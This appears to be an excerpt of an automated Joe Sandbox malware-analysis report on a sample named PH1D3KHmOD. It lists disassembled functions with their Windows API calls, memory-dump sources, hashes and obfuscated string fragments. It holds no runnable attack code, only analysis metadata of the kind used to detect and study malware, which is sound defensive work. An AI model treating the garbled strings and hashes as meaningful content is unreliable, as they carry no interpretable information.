                                                      • Not Executed
                                                      control_flow_graph 87 eef53-ef0b5 CoInitializeEx
                                                      APIs
                                                      • CoInitializeEx.COMBASE(00000000,00000002), ref: 000EF09D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: Initialize
                                                      • String ID:
                                                      • API String ID: 2538663250-0
                                                      • Opcode ID: 66e65d860157b5ad7bcd07d22d5b5952751976fa149d0b8cbe3cbf49953e0a0b
                                                      • Instruction ID: cc41f68f9af8072c028509b344a956168a52aecb83bd796261a2ee26ae278131
                                                      • Opcode Fuzzy Hash: 66e65d860157b5ad7bcd07d22d5b5952751976fa149d0b8cbe3cbf49953e0a0b
                                                      • Instruction Fuzzy Hash: CE41D8B4910B40AFD370EF3D994B7137EB8AB05250F504B1EF9E6866D4E231A4198BD7
                                                      Function 000EEC77 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 89 eec77-eecbb CoInitializeSecurity
                                                      APIs
                                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 000EECA3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: InitializeSecurity
                                                      • String ID:
                                                      • API String ID: 640775948-0
                                                      • Opcode ID: e2f47405ff3dc03b03215f3dbc089ea21861dd9effd79e0cb27c94256104b711
                                                      • Instruction ID: e7bd40f17c46d2cd3219354b94362d6fde9f7d2eb9a7ca42ffcb85c49334af7a
                                                      • Opcode Fuzzy Hash: e2f47405ff3dc03b03215f3dbc089ea21861dd9effd79e0cb27c94256104b711
                                                      • Instruction Fuzzy Hash: 22E092347EA3827AF67983149CE3F2621079B42F34E345B04B7213D7D5CAE43152824C
                                                      Function 000E9EB7 Relevance: 1.5, APIs: 1, Instructions: 18networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 91 e9eb7-e9ef7 call 11fe00 WSAStartup
                                                      APIs
                                                      • WSAStartup.WS2_32(00000202,?), ref: 000E9ED2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: Startup
                                                      • String ID:
                                                      • API String ID: 724789610-0
                                                      • Opcode ID: 6e8050f7acd85c9d4abacdccc9f27eddff88c3c044e6df173c7c28ed0fa418bf
                                                      • Instruction ID: 5d34838b33ebb6131afb4baa06bae947b39bec9a7aabfbfb3214c89672048d12
                                                      • Opcode Fuzzy Hash: 6e8050f7acd85c9d4abacdccc9f27eddff88c3c044e6df173c7c28ed0fa418bf
                                                      • Instruction Fuzzy Hash: FBE02B33641602BBD704DB30EC87E893357EB153417069438E205C1572EB72A472DA50
                                                      Function 0011C570 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 94 11c570-11c57c 95 11c583-11c584 94->95 96 11c585-11c597 call 11f990 RtlFreeHeap 94->96
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(?,00000000,?,0011E0F9), ref: 0011C590
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: 42e39f9f203442c4313559fbe0a14143c0911c9a09b21b65c61f3a13ce38d768
                                                      • Instruction ID: e75b45619506aef2d9c5b3719b15979087cd8b76cd1b1da32eb491f41704b7dc
                                                      • Opcode Fuzzy Hash: 42e39f9f203442c4313559fbe0a14143c0911c9a09b21b65c61f3a13ce38d768
                                                      • Instruction Fuzzy Hash: 3DD0C931415122FBC6143F28BC06BC73A94AF59220F0708A1F5046A474D724ECD2CAD0
                                                      Function 0011C55C Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 100 11c55c-11c568 RtlAllocateHeap
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(?,00000000), ref: 0011C561
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 063853bd35322bfc6fb94da5d70007b7988ef9cf3934e159e77ff68ffd83459b
                                                      • Instruction ID: bdd3ceac74c33e114be86ad25846e13299d043bbac0633f93561997ff19f4aea
                                                      • Opcode Fuzzy Hash: 063853bd35322bfc6fb94da5d70007b7988ef9cf3934e159e77ff68ffd83459b
                                                      • Instruction Fuzzy Hash: 7AA001B11842109ADA562B24BC0AB847A21AB59621F124191E501594B6867298929A84
                                                      Function 001390C2 Relevance: 1.3, APIs: 1, Instructions: 24memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualAlloc.KERNELBASE(00000000), ref: 00139215
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 2a6d3715c13e1689ff8065dabd81db49e9a041c50e86955ecca511ed1265c727
                                                      • Instruction ID: b5b8f92a266228a5c80c86ff31d559a09e1c196756357119ae574d5b69463afd
                                                      • Opcode Fuzzy Hash: 2a6d3715c13e1689ff8065dabd81db49e9a041c50e86955ecca511ed1265c727
                                                      • Instruction Fuzzy Hash: 59E06DB5509609DFD7042F38E8985AE7BE0EF08361F220719F8E6CA6C4CB310D508B6A
                                                      Function 000EDDBB Relevance: 1.3, APIs: 1, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: Uninitialize
                                                      • String ID:
                                                      • API String ID: 3861434553-0
                                                      • Opcode ID: 4fa263e81630fad94620e057e9bf03b292094efd9e331b4eca2d564ec891b018
                                                      • Instruction ID: d40545ac256b62992aaca00c3c8c8b8fa8e0e6207b88ed25dc7076b9be4a091a
                                                      • Opcode Fuzzy Hash: 4fa263e81630fad94620e057e9bf03b292094efd9e331b4eca2d564ec891b018
                                                      • Instruction Fuzzy Hash: 84C012342680806BC358932199A247B6217CF87348314582AC40741747D670A5528544
                                                      Function 00139865 Relevance: 1.3, APIs: 1, Instructions: 14memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualAlloc.KERNELBASE(00000000), ref: 00139870
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 8cf3413bb104a380bc61f2d7dd7839454efd3bd29604274d5b46156a4d7b174d
                                                      • Instruction ID: 577dc9e4badd664fc2fb38a3acd27a682fa3d024cb8cd05a9675250e554a5af3
                                                      • Opcode Fuzzy Hash: 8cf3413bb104a380bc61f2d7dd7839454efd3bd29604274d5b46156a4d7b174d
                                                      • Instruction Fuzzy Hash: BBD06CB550C248AFEB11AF14C845A7EBAB9EF94700F014928EDC98A250D7321C20DE92

                                                      Non-executed Functions

                                                      Function 001042D0 Relevance: 39.6, APIs: 2, Strings: 20, Instructions: 1129COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 001043AA
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0010443E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentExpandStrings
                                                      • String ID: +$e$+$e$ n l$%r?p$<j:h$=:$DD$N~4|$Xs$e>n<$gd$r:i8$ut$13$=?$b`$tj$uw$y{$|r
                                                      • API String ID: 237503144-1429676654
                                                      • Opcode ID: 7d57b0809f4d9f27985e2184ead725f03182b97e3baa7318d7d9e754e509fad3
                                                      • Instruction ID: 860684e37e675f32505778d10de4055899d92da528c475bebb6265a7c5d181df
                                                      • Opcode Fuzzy Hash: 7d57b0809f4d9f27985e2184ead725f03182b97e3baa7318d7d9e754e509fad3
                                                      • Instruction Fuzzy Hash: 1CC20CB560D3848AD334CF14D452BDFBAF2FB82300F00892DD5E96B655D7B1864A8B9B
                                                      Function 00104560 Relevance: 36.1, APIs: 1, Strings: 19, Instructions: 1081COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: +$e$ n l$%r?p$<j:h$=:$DD$N~4|$Xs$e>n<$gd$r:i8$ut$13$=?$b`$tj$uw$y{$|r
                                                      • API String ID: 0-3233044194
                                                      • Opcode ID: 3e5714e30c3d22735f7980ba1f5c4038bb49ba357d465ec8be9c416741daa6ed
                                                      • Instruction ID: 0610db8fcb847b3ac571c2ca353af042bd9474b5ab40700ba5201ec7fd003c17
                                                      • Opcode Fuzzy Hash: 3e5714e30c3d22735f7980ba1f5c4038bb49ba357d465ec8be9c416741daa6ed
                                                      • Instruction Fuzzy Hash: 52C21DB560D3848AE334CF54C452BDFBAF2FB82300F00892DD5E96B655D7B1464A8B9B
                                                      Function 000EB100 Relevance: 19.2, Strings: 15, Instructions: 425COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (Y6[$.AtC$9]_$D!M#$Gq\s$Gu@w$S%U'$XyR{$Ym]o$b6j4$hI2K$k=W?$pE}G$yQrS$zMzO
                                                      • API String ID: 0-620192811
                                                      • Opcode ID: 11c015dd197e570f2fdc07bb442bc8113e1e7ba1a91e77874462be0a70133627
                                                      • Instruction ID: 208161a57ebc2b626ffa233a85f893a4c71bb5772c5dbbf1ae504593933ab12d
                                                      • Opcode Fuzzy Hash: 11c015dd197e570f2fdc07bb442bc8113e1e7ba1a91e77874462be0a70133627
                                                      • Instruction Fuzzy Hash: E90245B1200B41DFD734CF25D891BABBBE2FB45314F508A2CD5AA8BAA0D774A455CF50
                                                      Function 00119280 Relevance: 18.2, APIs: 2, Strings: 8, Instructions: 661COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: FreeString
                                                      • String ID: :;$%$=hn$Jtuj$O^$SB$b{tu$gd$t"j
                                                      • API String ID: 3341692771-1335595022
                                                      • Opcode ID: bc2866b0fb7a199c2885e24f9001e23a203715b33722de9e051d5ab2ec12b902
                                                      • Instruction ID: 0c5cce54041c75309bc0e3125f119e633aaf3577b2ae6cc41f8f260c85392fac
                                                      • Opcode Fuzzy Hash: bc2866b0fb7a199c2885e24f9001e23a203715b33722de9e051d5ab2ec12b902
                                                      • Instruction Fuzzy Hash: B1222376A183519BD314CF24C890B9BBBE2EFC5314F18892CE5E49B3A1D775D845CB82
